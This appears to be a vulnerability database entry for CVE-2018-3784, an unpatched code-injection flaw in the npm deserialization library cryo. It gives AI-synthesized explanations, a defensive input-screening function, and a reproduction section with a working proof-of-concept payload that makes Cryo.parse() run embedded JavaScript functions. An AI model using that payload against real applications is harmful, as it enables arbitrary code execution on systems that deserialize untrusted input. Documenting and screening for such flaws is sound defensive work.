CVE-2018-3784
Description
Cryo 0.0.6 is vulnerable to arbitrary code execution via insecure deserialization, allowing an attacker to execute arbitrary JavaScript functions.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Vulnerability
Cryo versions 0.0.6 and earlier are vulnerable to code injection due to an insecure implementation of deserialization [1][2]. The library's parse function does not properly sanitize serialized data, allowing an attacker to inject arbitrary JavaScript functions into the deserialized object.
Exploitation
An attacker can craft a malicious serialized JSON payload containing references to JavaScript functions. When Cryo.parse() is called on this payload, the functions are evaluated and executed [2]. No authentication or special privileges are required; the only prerequisite is that an application uses cryo to deserialize untrusted input.
Impact
Successful exploitation leads to arbitrary code execution within the context of the application [1][2]. The attacker gains the ability to execute arbitrary JavaScript, potentially leading to complete compromise of the host system, data exfiltration, or further attacks.
Mitigation
As of the last available advisories, no fix has been released for cryo [2]. Users are strongly advised to avoid using cryo with untrusted data and to consider switching to an alternative module that provides secure deserialization [2]. The vulnerability is considered critical with a CVSS score of 9.8 [1].
AI Insight generated on May 22, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
| cryo (npm) | <= 0.0.6 | — |
Affected products
- Range: Not fixed
Patches
No patches discovered yet.
Vulnerability mechanics
Root cause
"Insecure deserialization implementation in cryo allows arbitrary code execution by embedding function definitions within serialized data."
Attack vector
An attacker crafts a JSON payload containing `_CRYO_FUNCTION_` markers that embed arbitrary JavaScript function bodies [ref_id=1]. The cryo library's `parse()` method evaluates these function strings during deserialization without sanitization [CWE-94]. The proof-of-concept payload uses `_CRYO_REF_` pointers to construct an object whose `__proto__` references a function, achieving code execution when the hydrated object is used [ref_id=1]. No authentication or special network access is required — the attacker only needs to supply the malicious serialized string to `Cryo.parse()`.
Affected code
The advisory does not specify exact file paths or function names within the cryo package. The vulnerability exists in the `Cryo.parse()` method, which deserializes JSON strings containing `_CRYO_FUNCTION_` markers by evaluating the embedded function bodies as live JavaScript code [ref_id=1].
What the fix does
No fix is currently available for cryo [ref_id=1]. The advisory recommends using an alternative module until a fix is made available [ref_id=1]. The root cause — evaluating untrusted strings as JavaScript functions during deserialization — would require the library to either disallow function serialization entirely or safely sandbox the evaluation, but no patch has been published.
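Because no patched release exists, serialized input can at least be screened with plain `JSON.parse` (which evaluates nothing) before any call to `Cryo.parse()`. The following is an added example, not code from the advisory or from cryo; the helper name `findCryoRisks` and the sample strings are constructed for illustration, and the check covers only the `_CRYO_FUNCTION_` marker and `__proto__` key described above.

```javascript
// Added example (not part of the cryo package): screen serialized input
// before it is handed to Cryo.parse().
const FUNCTION_MARKER = '_CRYO_FUNCTION_';   // marker named in the advisory text
const BLOCKED_KEYS = new Set(['__proto__']); // key used by the published PoC

// Hypothetical helper. Returns a list of findings; an empty list means
// neither pattern described on this page was found.
function findCryoRisks(serialized) {
  let doc;
  try {
    doc = JSON.parse(serialized); // plain JSON.parse never evaluates code
  } catch (err) {
    return [{ path: '$', reason: 'not valid JSON' }];
  }
  const findings = [];
  const stack = [{ value: doc, path: '$' }];
  while (stack.length > 0) {
    const { value, path } = stack.pop();
    if (typeof value === 'string') {
      if (value.startsWith(FUNCTION_MARKER)) {
        findings.push({ path, reason: 'embedded function body' });
      }
    } else if (value !== null && typeof value === 'object') {
      // JSON.parse creates "__proto__" as an own property, so Object.keys sees it.
      for (const key of Object.keys(value)) {
        const child = Array.isArray(value) ? `${path}[${key}]` : `${path}.${key}`;
        if (BLOCKED_KEYS.has(key)) {
          findings.push({ path: child, reason: 'prototype key' });
        }
        stack.push({ value: value[key], path: child });
      }
    }
  }
  return findings;
}

// Constructed sample inputs (not captured traffic).
const BENIGN = '{"root":"_CRYO_REF_0","references":[{"contents":{"name":"alice"},"value":"_CRYO_OBJECT_"}]}';
const SUSPECT = '{"root":"_CRYO_REF_1","references":[' +
  '{"contents":{},"value":"_CRYO_FUNCTION_function () { return 1; }"},' +
  '{"contents":{"__proto__":"_CRYO_REF_0"},"value":"_CRYO_OBJECT_"}]}';

console.log(findCryoRisks(BENIGN));  // no findings
console.log(findCryoRisks(SUSPECT)); // one finding per flagged pattern
```

A filter like this only rejects the two patterns the advisory describes; it does not make `Cryo.parse()` safe for untrusted data, and the advisory's recommendation to use an alternative module still stands.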
Preconditions
- Input: The attacker must be able to supply a malicious serialized string to the `Cryo.parse()` method.
Reproduction
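```javascript
var Cryo = require('cryo');

// Serialized payload: references 0 and 1 carry function bodies, reference 2
// maps toString/valueOf to them, and the root (reference 3) points its
// __proto__ at reference 2.
var frozen = '{"root":"_CRYO_REF_3","references":[{"contents":{},"value":"_CRYO_FUNCTION_function () {console.log(\\"defconrussia\\"); return 1111;}"},{"contents":{},"value":"_CRYO_FUNCTION_function () {console.log(\\"defconrussia\\");return 2222;}"},{"contents":{"toString":"_CRYO_REF_0","valueOf":"_CRYO_REF_1"},"value":"_CRYO_OBJECT_"},{"contents":{"__proto__":"_CRYO_REF_2"},"value":"_CRYO_OBJECT_"}]}';

// Cryo.parse() evaluates the _CRYO_FUNCTION_ strings while hydrating.
var hydrated = Cryo.parse(frozen);
console.log(hydrated);
```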
Generated on May 27, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
- github.com/advisories/GHSA-38f5-ghc2-fcmv (GHSA, advisory)
- nvd.nist.gov/vuln/detail/CVE-2018-3784 (GHSA, advisory)
- hackerone.com/reports/350418 (GHSA, x_refsource_MISC, web)
- www.npmjs.com/advisories/690 (GHSA, web)